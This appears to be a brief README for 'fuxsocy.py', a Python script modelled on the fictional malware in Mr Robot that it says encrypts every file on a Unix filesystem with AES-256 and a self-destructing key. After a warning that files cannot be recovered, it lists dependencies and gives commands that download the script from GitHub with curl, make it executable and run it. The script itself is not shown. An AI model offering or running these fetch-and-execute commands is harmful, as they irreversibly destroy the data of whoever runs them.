WARNING: do not actually execute this. You will not be able to recover the files.
This is intended to encrypt every bit of data in a unix filesystem using 256-bit AES with a self-destructing, randomly generated key.
The fuxsocy.py script is based on Darlene's malware shown in Mr Robot
- Python3
- pycrypto
sudo apt install python3 python3-pip
pip3 install pycrypto
curl https://raw.githubusercontent.com/joekendal/fsociety/master/fuxsocy.py
sudo chmod +x fuxsocy.py
./fuxsocy.py